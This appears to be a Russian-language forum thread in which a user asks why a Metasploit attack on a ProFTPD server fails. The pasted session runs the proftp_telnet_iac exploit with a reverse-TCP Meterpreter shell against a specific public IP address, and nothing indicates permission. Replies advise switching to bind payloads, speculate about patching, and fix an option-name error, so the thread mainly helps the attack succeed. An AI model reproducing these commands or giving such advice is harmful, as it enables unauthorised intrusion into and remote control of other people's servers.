Что не так? Code: msf > use linux/ftp/proftp_telnet_iac msf exploit(proftp_telnet_iac) > set RHOST 213.239.235.179 RHOST => 213.239.235.179 msf exploit(proftp_telnet_iac) > set RPORT 21 RPORT => 21 msf exploit(proftp_telnet_iac) > set TARGET 0 TARGET => 0 msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf exploit(proftp_telnet_iac) > set LHOST 192.168.1.4 LHOST => 192.168.1.4 msf exploit(proftp_telnet_iac) > exploit [*] Started reverse handler on 192.168.1.4:4444 [*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179] [*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1 msf exploit(proftp_telnet_iac) > И всё((
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое. По вероятности: 1) Целевая версия таки не уязвима 2) Цель уязвима, но не может законнектиться к вам.
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2? Спасибо.
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер. Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
И shell_bind_tcp, и bind_tcp тоже не работают. P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)
За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.
Code: Started reverse handler on 192.168.1.4:4444 Ну на сколько я понимаю хэндлер запущен и проброс в локалку тоже есть. После того как я запускаю сплойт появляется вот эта строка Code: msf exploit(proftp_telnet_iac) > и консоль зависает, т.е. ничего нельзя ввести, Ctrl+c и Ctrl+x ничего не работает.
Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.
Будьте внимательнее в следующий раз , ошибка новичков там написано RHOSTS а не RHOST http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/